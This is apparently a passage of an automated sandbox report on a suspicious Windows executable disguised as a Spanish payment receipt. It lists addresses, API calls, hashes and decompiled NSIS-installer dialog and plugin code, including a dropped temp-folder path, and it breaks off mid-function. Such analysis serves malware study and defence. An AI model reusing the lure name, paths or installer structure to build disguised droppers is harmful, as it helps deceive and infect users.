                                        0x004050ce
                                        0x004050de
                                        0x004050e8
                                        0x004050ea
                                        0x004050ed
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x004050d0
                                        0x004050d0
                                        0x004050d6
                                        0x004050d8
                                        0x004050d8
                                        0x004050d9
                                        0x004050da
                                        0x00000000
                                        0x004050d0
                                        0x004050b3
                                        0x0040508e
                                        0x00404fd1
                                        0x00000000
                                        0x00404fe7
                                        0x00404ff1
                                        0x00404ff6
                                        0x00000000
                                        0x00000000
                                        0x00405008
                                        0x0040500d
                                        0x00405019
                                        0x00405019
                                        0x0040501b
                                        0x0040502a
                                        0x0040502c
                                        0x00405030
                                        0x00405033
                                        0x00000000
                                        0x00405033
                                        0x00404fd1
                                        0x00404c91
                                        0x00404c96
                                        0x00404c9f
                                        0x00404ca6
                                        0x00404cb4
                                        0x00404cbf
                                        0x00404cc5
                                        0x00404cd3
                                        0x00404ce7
                                        0x00404cec
                                        0x00404cf9
                                        0x00404cfe
                                        0x00404d14
                                        0x00404d25
                                        0x00404d32
                                        0x00404d32
                                        0x00404d35
                                        0x00404d3b
                                        0x00404d3d
                                        0x00404d40
                                        0x00404d45
                                        0x00404d4a
                                        0x00404d4c
                                        0x00404d4c
                                        0x00404d6c
                                        0x00404d6c
                                        0x00404d6e
                                        0x00404d6f
                                        0x00404d74
                                        0x00404d77
                                        0x00404d7a
                                        0x00404d7e
                                        0x00404d83
                                        0x00404d88
                                        0x00404d8c
                                        0x00404d91
                                        0x00404d96
                                        0x00404d98
                                        0x00404da0
                                        0x00404e6b
                                        0x00404e7e
                                        0x00000000
                                        0x00404da6
                                        0x00404da9
                                        0x00404dac
                                        0x00404daf
                                        0x00404daf
                                        0x00404db6
                                        0x00404dbc
                                        0x00404dbf
                                        0x00404dc5
                                        0x00404dc6
                                        0x00404dcb
                                        0x00404dd4
                                        0x00404ddb
                                        0x00404dde
                                        0x00404de1
                                        0x00404de4
                                        0x00404e20
                                        0x00404e49
                                        0x00404e22
                                        0x00404e2f
                                        0x00404e2f
                                        0x00404de6
                                        0x00404de9
                                        0x00404df8
                                        0x00404e02
                                        0x00404e0a
                                        0x00404e11
                                        0x00404e19
                                        0x00404e19
                                        0x00404de4
                                        0x00404e4f
                                        0x00404e50
                                        0x00404e5c
                                        0x00404e5c
                                        0x00404e69
                                        0x00404e84
                                        0x00404e88
                                        0x00404ea5
                                        0x00404eaa
                                        0x00000000
                                        0x00404e8a
                                        0x00404e8f
                                        0x00404e98
                                        0x00405222
                                        0x00405234
                                        0x00405234
                                        0x00404e88
                                        0x00000000
                                        0x00404e69
                                        0x00404da0

                                        APIs
                                        • GetDlgItem.USER32(?,000003F9), ref: 00404C57
                                        • GetDlgItem.USER32(?,00000408), ref: 00404C62
                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404CAC
                                        • LoadBitmapW.USER32(0000006E), ref: 00404CBF
                                        • SetWindowLongW.USER32(?,000000FC,00405237), ref: 00404CD8
                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404CEC
                                        • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404CFE
                                        • SendMessageW.USER32(?,00001109,00000002), ref: 00404D14
                                        • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D20
                                        • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D32
                                        • DeleteObject.GDI32(00000000), ref: 00404D35
                                        • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D60
                                        • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D6C
                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E02
                                        • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E2D
                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E41
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00404E70
                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404E7E
                                        • ShowWindow.USER32(?,00000005), ref: 00404E8F
                                        • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404F8C
                                        • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404FF1
                                        • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405006
                                        • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 0040502A
                                        • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040504A
                                        • ImageList_Destroy.COMCTL32(?), ref: 0040505F
                                        • GlobalFree.KERNEL32(?), ref: 0040506F
                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004050E8
                                        • SendMessageW.USER32(?,00001102,?,?), ref: 00405191
                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051A0
                                        • InvalidateRect.USER32(?,00000000,?), ref: 004051C0
                                        • ShowWindow.USER32(?,00000000), ref: 0040520E
                                        • GetDlgItem.USER32(?,000003FE), ref: 00405219
                                        • ShowWindow.USER32(00000000), ref: 00405220
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                        • String ID: $M$N
                                        • API String ID: 1638840714-813528018
                                        • Opcode ID: efe07da3f21e8944becdbd6b16cc60fa8a21edaf4e8f3c48f24736c6ed69ddc7
                                        • Instruction ID: 12ef5a05c60c6c20dcbbeb1066bc3531ea5280fcb44ea9637735f2a88fa268fa
                                        • Opcode Fuzzy Hash: efe07da3f21e8944becdbd6b16cc60fa8a21edaf4e8f3c48f24736c6ed69ddc7
                                        • Instruction Fuzzy Hash: 670260B0900209EFEB109F64DD85AAE7BB5FB85314F10817AF610BA2E1DB799D41CF58
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 78%
                                        			E004046C3(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                        				signed int _v8;
                                        				signed int _v12;
                                        				long _v16;
                                        				long _v20;
                                        				long _v24;
                                        				char _v28;
                                        				intOrPtr _v32;
                                        				long _v36;
                                        				char _v40;
                                        				unsigned int _v44;
                                        				signed int _v48;
                                        				WCHAR* _v56;
                                        				intOrPtr _v60;
                                        				intOrPtr _v64;
                                        				intOrPtr _v68;
                                        				WCHAR* _v72;
                                        				void _v76;
                                        				struct HWND__* _v80;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				intOrPtr _t82;
                                        				long _t87;
                                        				short* _t89;
                                        				void* _t95;
                                        				signed int _t96;
                                        				int _t109;
                                        				signed short _t114;
                                        				signed int _t118;
                                        				struct HWND__** _t122;
                                        				intOrPtr* _t138;
                                        				WCHAR* _t146;
                                        				intOrPtr _t147;
                                        				unsigned int _t150;
                                        				signed int _t152;
                                        				unsigned int _t156;
                                        				signed int _t158;
                                        				signed int* _t159;
                                        				signed int* _t160;
                                        				struct HWND__* _t166;
                                        				struct HWND__* _t167;
                                        				int _t169;
                                        				unsigned int _t197;
                                        
                                        				_t156 = __edx;
                                        				_t82 =  *0x7a0ef8; // 0x87e0fc
                                        				_v32 = _t82;
                                        				_t2 = _t82 + 0x3c; // 0x0
                                        				_t3 = _t82 + 0x38; // 0x0
                                        				_t146 = ( *_t2 << 0xb) + 0x7a9000;
                                        				_v12 =  *_t3;
                                        				if(_a8 == 0x40b) {
                                        					E004058A5(0x3fb, _t146);
                                        					E004064F3(_t146);
                                        				}
                                        				_t167 = _a4;
                                        				if(_a8 != 0x110) {
                                        					L8:
                                        					if(_a8 != 0x111) {
                                        						L20:
                                        						if(_a8 == 0x40f) {
                                        							L22:
                                        							_v8 = _v8 & 0x00000000;
                                        							_v12 = _v12 & 0x00000000;
                                        							E004058A5(0x3fb, _t146);
                                        							if(E00405C38(_t186, _t146) == 0) {
                                        								_v8 = 1;
                                        							}
                                        							E0040625F(0x79fef0, _t146);
                                        							_t87 = E00406639("true");
                                        							_v16 = _t87;
                                        							if(_t87 == 0) {
                                        								L30:
                                        								E0040625F(0x79fef0, _t146);
                                        								_t89 = E00405BDB(0x79fef0);
                                        								_t158 = 0;
                                        								if(_t89 != 0) {
                                        									 *_t89 = 0;
                                        								}
                                        								if(GetDiskFreeSpaceW(0x79fef0,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                        									goto L35;
                                        								} else {
                                        									_t169 = 0x400;
                                        									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                        									asm("cdq");
                                        									_v48 = _t109;
                                        									_v44 = _t156;
                                        									_v12 = 1;
                                        									goto L36;
                                        								}
                                        							} else {
                                        								_t159 = 0;
                                        								if(0 == 0x79fef0) {
                                        									goto L30;
                                        								} else {
                                        									goto L26;
                                        								}
                                        								while(1) {
                                        									L26:
                                        									_t114 = _v16(0x79fef0,  &_v48,  &_v28,  &_v40);
                                        									if(_t114 != 0) {
                                        										break;
                                        									}
                                        									if(_t159 != 0) {
                                        										 *_t159 =  *_t159 & _t114;
                                        									}
                                        									_t160 = E00405B7C(0x79fef0);
                                        									 *_t160 =  *_t160 & 0x00000000;
                                        									_t159 = _t160;
                                        									 *_t159 = 0x5c;
                                        									if(_t159 != 0x79fef0) {
                                        										continue;
                                        									} else {
                                        										goto L30;
                                        									}
                                        								}
                                        								_t150 = _v44;
                                        								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                        								_v44 = _t150 >> 0xa;
                                        								_v12 = 1;
                                        								_t158 = 0;
                                        								__eflags = 0;
                                        								L35:
                                        								_t169 = 0x400;
                                        								L36:
                                        								_t95 = E00404B60(5);
                                        								if(_v12 != _t158) {
                                        									_t197 = _v44;
                                        									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                        										_v8 = 2;
                                        									}
                                        								}
                                        								_t147 =  *0x7a79fc; // 0x880d16
                                        								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
                                        									E00404B48(0x3ff, 0xfffffffb, _t95);
                                        									if(_v12 == _t158) {
                                        										SetDlgItemTextW(_a4, _t169, 0x79fee0);
                                        									} else {
                                        										E00404A7F(_t169, 0xfffffffc, _v48, _v44);
                                        									}
                                        								}
                                        								_t96 = _v8;
                                        								 *0x7a8ae4 = _t96;
                                        								if(_t96 == _t158) {
                                        									_v8 = E0040140B(7);
                                        								}
                                        								if(( *(_v32 + 0x14) & _t169) != 0) {
                                        									_v8 = _t158;
                                        								}
                                        								E00404216(0 | _v8 == _t158);
                                        								if(_v8 == _t158 &&  *0x7a1f10 == _t158) {
                                        									E0040461C();
                                        								}
                                        								 *0x7a1f10 = _t158;
                                        								goto L53;
                                        							}
                                        						}
                                        						_t186 = _a8 - 0x405;
                                        						if(_a8 != 0x405) {
                                        							goto L53;
                                        						}
                                        						goto L22;
                                        					}
                                        					_t118 = _a12 & 0x0000ffff;
                                        					if(_t118 != 0x3fb) {
                                        						L12:
                                        						if(_t118 == 0x3e9) {
                                        							_t152 = 7;
                                        							memset( &_v76, 0, _t152 << 2);
                                        							_v80 = _t167;
                                        							_v72 = 0x7a1f20;
                                        							_v60 = E00404A19;
                                        							_v56 = _t146;
                                        							_v68 = E00406281(_t146, 0x7a1f20, _t167, 0x7a06f8, _v12);
                                        							_t122 =  &_v80;
                                        							_v64 = 0x41;
                                        							__imp__SHBrowseForFolderW(_t122);
                                        							if(_t122 == 0) {
                                        								_a8 = 0x40f;
                                        							} else {
                                        								__imp__CoTaskMemFree(_t122);
                                        								E00405B30(_t146);
                                        								_t125 =  *((intOrPtr*)( *0x7a8a34 + 0x11c));
                                        								if( *((intOrPtr*)( *0x7a8a34 + 0x11c)) != 0 && _t146 == L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Musicalises34\\Coleman\\Biarcuated") {
                                        									E00406281(_t146, 0x7a1f20, _t167, 0, _t125);
                                        									if(lstrcmpiW(0x7a69c0, 0x7a1f20) != 0) {
                                        										lstrcatW(_t146, 0x7a69c0);
                                        									}
                                        								}
                                        								 *0x7a1f10 =  *0x7a1f10 + 1;
                                        								SetDlgItemTextW(_t167, 0x3fb, _t146);
                                        							}
                                        						}
                                        						goto L20;
                                        					}
                                        					if(_a12 >> 0x10 != 0x300) {
                                        						goto L53;
                                        					}
                                        					_a8 = 0x40f;
                                        					goto L12;
                                        				} else {
                                        					_t166 = GetDlgItem(_t167, 0x3fb);
                                        					if(E00405BA7(_t146) != 0 && E00405BDB(_t146) == 0) {
                                        						E00405B30(_t146);
                                        					}
                                        					 *0x7a79f8 = _t167;
                                        					SetWindowTextW(_t166, _t146);
                                        					_push( *((intOrPtr*)(_a16 + 0x34)));
                                        					_push("true");
                                        					E004041F4(_t167);
                                        					_push( *((intOrPtr*)(_a16 + 0x30)));
                                        					_push(0x14);
                                        					E004041F4(_t167);
                                        					E00404229(_t166);
                                        					_t138 = E00406639(7);
                                        					if(_t138 == 0) {
                                        						L53:
                                        						return E0040425B(_a8, _a12, _a16);
                                        					} else {
                                        						 *_t138(_t166, "true");
                                        						goto L8;
                                        					}
                                        				}
                                        			}














































                                        0x004046c3
                                        0x004046c9
                                        0x004046cf
                                        0x004046d3
                                        0x004046d6
                                        0x004046dc
                                        0x004046ea
                                        0x004046ed
                                        0x004046f5
                                        0x004046fb
                                        0x004046fb
                                        0x00404707
                                        0x0040470a
                                        0x00404778
                                        0x0040477f
                                        0x00404856
                                        0x0040485d
                                        0x0040486c
                                        0x0040486c
                                        0x00404870
                                        0x0040487a
                                        0x00404887
                                        0x00404889
                                        0x00404889
                                        0x00404897
                                        0x0040489e
                                        0x004048a5
                                        0x004048a8
                                        0x004048e4
                                        0x004048e6
                                        0x004048ec
                                        0x004048f1
                                        0x004048f5
                                        0x004048f7
                                        0x004048f7
                                        0x00404913
                                        0x00000000
                                        0x00404915
                                        0x00404918
                                        0x00404926
                                        0x0040492c
                                        0x0040492d
                                        0x00404930
                                        0x00404933
                                        0x00000000
                                        0x00404933
                                        0x004048aa
                                        0x004048ac
                                        0x004048b0
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x004048b2
                                        0x004048b2
                                        0x004048bf
                                        0x004048c4
                                        0x00000000
                                        0x00000000
                                        0x004048c8
                                        0x004048ca
                                        0x004048ca
                                        0x004048d3
                                        0x004048d5
                                        0x004048da
                                        0x004048dd
                                        0x004048e2
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x004048e2
                                        0x0040493f
                                        0x00404949
                                        0x0040494c
                                        0x0040494f
                                        0x00404956
                                        0x00404956
                                        0x00404958
                                        0x00404958
                                        0x0040495d
                                        0x0040495f
                                        0x00404967
                                        0x0040496e
                                        0x00404970
                                        0x0040497b
                                        0x0040497b
                                        0x00404970
                                        0x00404982
                                        0x0040498b
                                        0x00404995
                                        0x0040499d
                                        0x004049b8
                                        0x0040499f
                                        0x004049a8
                                        0x004049a8
                                        0x0040499d
                                        0x004049bd
                                        0x004049c2
                                        0x004049c7
                                        0x004049d0
                                        0x004049d0
                                        0x004049d9
                                        0x004049db
                                        0x004049db
                                        0x004049e7
                                        0x004049ef
                                        0x004049f9
                                        0x004049f9
                                        0x004049fe
                                        0x00000000
                                        0x004049fe
                                        0x004048a8
                                        0x0040485f
                                        0x00404866
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00404866
                                        0x00404785
                                        0x0040478e
                                        0x004047a8
                                        0x004047ad
                                        0x004047b7
                                        0x004047be
                                        0x004047ca
                                        0x004047cd
                                        0x004047d0
                                        0x004047d7
                                        0x004047df
                                        0x004047e2
                                        0x004047e6
                                        0x004047ed
                                        0x004047f5
                                        0x0040484f
                                        0x004047f7
                                        0x004047f8
                                        0x004047ff
                                        0x00404809
                                        0x00404811
                                        0x0040481e
                                        0x00404832
                                        0x00404836
                                        0x00404836
                                        0x00404832
                                        0x0040483b
                                        0x00404848
                                        0x00404848
                                        0x004047f5
                                        0x00000000
                                        0x004047ad
                                        0x0040479b
                                        0x00000000
                                        0x00000000
                                        0x004047a1
                                        0x00000000
                                        0x0040470c
                                        0x00404719
                                        0x00404722
                                        0x0040472f
                                        0x0040472f
                                        0x00404736
                                        0x0040473c
                                        0x00404745
                                        0x00404748
                                        0x0040474b
                                        0x00404753
                                        0x00404756
                                        0x00404759
                                        0x0040475f
                                        0x00404766
                                        0x0040476d
                                        0x00404a04
                                        0x00404a16
                                        0x00404773
                                        0x00404776
                                        0x00000000
                                        0x00404776
                                        0x0040476d

                                        APIs
                                        • GetDlgItem.USER32(?,000003FB), ref: 00404712
                                        • SetWindowTextW.USER32(00000000,-007A9000), ref: 0040473C
                                        • SHBrowseForFolderW.SHELL32(?), ref: 004047ED
                                        • CoTaskMemFree.OLE32(00000000), ref: 004047F8
                                        • lstrcmpiW.KERNEL32(Call,007A1F20,00000000,?,-007A9000), ref: 0040482A
                                        • lstrcatW.KERNEL32(-007A9000,Call), ref: 00404836
                                        • SetDlgItemTextW.USER32(?,000003FB,-007A9000), ref: 00404848
                                          • Part of subcall function 004058A5: GetDlgItemTextW.USER32(?,?,00000400,0040487F), ref: 004058B8
                                          • Part of subcall function 004064F3: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exe",0040332B,C:\Users\user\AppData\Local\Temp\,76583420,0040359C,?,00000006,00000008,0000000A), ref: 00406556
                                          • Part of subcall function 004064F3: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406565
                                          • Part of subcall function 004064F3: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exe",0040332B,C:\Users\user\AppData\Local\Temp\,76583420,0040359C,?,00000006,00000008,0000000A), ref: 0040656A
                                          • Part of subcall function 004064F3: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exe",0040332B,C:\Users\user\AppData\Local\Temp\,76583420,0040359C,?,00000006,00000008,0000000A), ref: 0040657D
                                        • GetDiskFreeSpaceW.KERNEL32(0079FEF0,?,?,0000040F,?,0079FEF0,0079FEF0,-007A9000,?,0079FEF0,-007A9000,-007A9000,000003FB,-007A9000), ref: 0040490B
                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404926
                                          • Part of subcall function 00404A7F: lstrlenW.KERNEL32(007A1F20,007A1F20,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,-007A9000), ref: 00404B20
                                          • Part of subcall function 00404A7F: wsprintfW.USER32 ref: 00404B29
                                          • Part of subcall function 00404A7F: SetDlgItemTextW.USER32(?,007A1F20), ref: 00404B3C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                        • String ID: A$C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated$Call
                                        • API String ID: 2624150263-3865270459
                                        • Opcode ID: d51832195b8407123dedbb082ffaa1d348f5dfd198bd9c85db8b114916822c7c
                                        • Instruction ID: 1a43a6be4abc44de482ff05cd7d85368efa207dbef88ee5e6ca465c7332a2ce1
                                        • Opcode Fuzzy Hash: d51832195b8407123dedbb082ffaa1d348f5dfd198bd9c85db8b114916822c7c
                                        • Instruction Fuzzy Hash: B0A1AEF1900209ABDB11AFA5CD45AAFB7B8EF84314F10843BF611B62D1DB7C99418B69
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 95%
                                        			E10001B18() {
                                        				signed int _v8;
                                        				signed int _v12;
                                        				signed int _v16;
                                        				signed int _v20;
                                        				WCHAR* _v24;
                                        				WCHAR* _v28;
                                        				signed int _v32;
                                        				signed int _v36;
                                        				signed int _v40;
                                        				WCHAR* _v44;
                                        				signed int _v48;
                                        				void* _v52;
                                        				intOrPtr _v56;
                                        				WCHAR* _t199;
                                        				signed int _t202;
                                        				void* _t204;
                                        				void* _t206;
                                        				WCHAR* _t208;
                                        				void* _t216;
                                        				struct HINSTANCE__* _t217;
                                        				struct HINSTANCE__* _t218;
                                        				struct HINSTANCE__* _t220;
                                        				signed short _t222;
                                        				struct HINSTANCE__* _t225;
                                        				struct HINSTANCE__* _t227;
                                        				void* _t228;
                                        				intOrPtr* _t229;
                                        				void* _t240;
                                        				signed char _t241;
                                        				signed int _t242;
                                        				struct HINSTANCE__* _t248;
                                        				void* _t249;
                                        				signed int _t251;
                                        				short* _t253;
                                        				signed int _t259;
                                        				void* _t260;
                                        				signed int _t263;
                                        				signed int _t266;
                                        				signed int _t267;
                                        				signed int _t272;
                                        				signed int _t273;
                                        				signed int _t274;
                                        				signed int _t275;
                                        				void* _t278;
                                        				void* _t282;
                                        				struct HINSTANCE__* _t284;
                                        				signed int _t287;
                                        				void _t288;
                                        				signed int _t289;
                                        				signed int _t301;
                                        				signed int _t302;
                                        				signed short _t308;
                                        				signed int _t309;
                                        				WCHAR* _t310;
                                        				WCHAR* _t312;
                                        				WCHAR* _t313;
                                        				struct HINSTANCE__* _t314;
                                        				void* _t316;
                                        				signed int _t318;
                                        				void* _t319;
                                        
                                        				_t284 = 0;
                                        				_v32 = 0;
                                        				_v36 = 0;
                                        				_v16 = 0;
                                        				_v8 = 0;
                                        				_v40 = 0;
                                        				_t319 = 0;
                                        				_v48 = 0;
                                        				_t199 = E1000121B();
                                        				_v24 = _t199;
                                        				_v28 = _t199;
                                        				_v44 = E1000121B();
                                        				_t309 = E10001243();
                                        				_v52 = _t309;
                                        				_v12 = _t309;
                                        				while(1) {
                                        					_t202 = _v32;
                                        					_v56 = _t202;
                                        					if(_t202 != _t284 && _t319 == _t284) {
                                        						break;
                                        					}
                                        					_t308 =  *_t309;
                                        					_t287 = _t308 & 0x0000ffff;
                                        					_t204 = _t287 - _t284;
                                        					if(_t204 == 0) {
                                        						_t33 =  &_v32;
                                        						 *_t33 = _v32 | 0xffffffff;
                                        						__eflags =  *_t33;
                                        						L17:
                                        						_t206 = _v56 - _t284;
                                        						if(_t206 == 0) {
                                        							__eflags = _t319 - _t284;
                                        							 *_v28 = _t284;
                                        							if(_t319 == _t284) {
                                        								_t319 = GlobalAlloc(0x40, 0x1ca4);
                                        								 *(_t319 + 0x1010) = _t284;
                                        								 *(_t319 + 0x1014) = _t284;
                                        							}
                                        							_t288 = _v36;
                                        							_t43 = _t319 + 8; // 0x8
                                        							_t208 = _t43;
                                        							_t44 = _t319 + 0x808; // 0x808
                                        							_t310 = _t44;
                                        							 *_t319 = _t288;
                                        							_t289 = _t288 - _t284;
                                        							__eflags = _t289;
                                        							 *_t208 = _t284;
                                        							 *_t310 = _t284;
                                        							 *(_t319 + 0x1008) = _t284;
                                        							 *(_t319 + 0x100c) = _t284;
                                        							 *(_t319 + 4) = _t284;
                                        							if(_t289 == 0) {
                                        								__eflags = _v28 - _v24;
                                        								if(_v28 == _v24) {
                                        									goto L39;
                                        								}
                                        								_t316 = 0;
                                        								GlobalFree(_t319);
                                        								_t319 = E10001311(_v24);
                                        								__eflags = _t319 - _t284;
                                        								if(_t319 == _t284) {
                                        									goto L39;
                                        								} else {
                                        									goto L32;
                                        								}
                                        								while(1) {
                                        									L32:
                                        									_t240 =  *(_t319 + 0x1ca0);
                                        									__eflags = _t240 - _t284;
                                        									if(_t240 == _t284) {
                                        										break;
                                        									}
                                        									_t316 = _t319;
                                        									_t319 = _t240;
                                        									__eflags = _t319 - _t284;
                                        									if(_t319 != _t284) {
                                        										continue;
                                        									}
                                        									break;
                                        								}
                                        								__eflags = _t316 - _t284;
                                        								if(_t316 != _t284) {
                                        									 *(_t316 + 0x1ca0) = _t284;
                                        								}
                                        								_t241 =  *(_t319 + 0x1010);
                                        								__eflags = _t241 & 0x00000008;
                                        								if((_t241 & 0x00000008) == 0) {
                                        									_t242 = _t241 | 0x00000002;
                                        									__eflags = _t242;
                                        									 *(_t319 + 0x1010) = _t242;
                                        								} else {
                                        									_t319 = E1000158F(_t319);
                                        									 *(_t319 + 0x1010) =  *(_t319 + 0x1010) & 0xfffffff5;
                                        								}
                                        								goto L39;
                                        							} else {
                                        								_t301 = _t289 - 1;
                                        								__eflags = _t301;
                                        								if(_t301 == 0) {
                                        									L28:
                                        									lstrcpyW(_t208, _v44);
                                        									L29:
                                        									lstrcpyW(_t310, _v24);
                                        									L39:
                                        									_v12 = _v12 + 2;
                                        									_v28 = _v24;
                                        									L63:
                                        									if(_v32 != 0xffffffff) {
                                        										_t309 = _v12;
                                        										continue;
                                        									}
                                        									break;
                                        								}
                                        								_t302 = _t301 - 1;
                                        								__eflags = _t302;
                                        								if(_t302 == 0) {
                                        									goto L29;
                                        								}
                                        								__eflags = _t302 != 1;
                                        								if(_t302 != 1) {
                                        									goto L39;
                                        								}
                                        								goto L28;
                                        							}
                                        						}
                                        						if(_t206 != 1) {
                                        							goto L39;
                                        						}
                                        						_t248 = _v16;
                                        						if(_v40 == _t284) {
                                        							_t248 = _t248 - 1;
                                        						}
                                        						 *(_t319 + 0x1014) = _t248;
                                        						goto L39;
                                        					}
                                        					_t249 = _t204 - 0x23;
                                        					if(_t249 == 0) {
                                        						__eflags = _t309 - _v52;
                                        						if(_t309 <= _v52) {
                                        							L15:
                                        							_v32 = _t284;
                                        							_v36 = _t284;
                                        							goto L17;
                                        						}
                                        						__eflags =  *((short*)(_t309 - 2)) - 0x3a;
                                        						if( *((short*)(_t309 - 2)) != 0x3a) {
                                        							goto L15;
                                        						}
                                        						__eflags = _v32 - _t284;
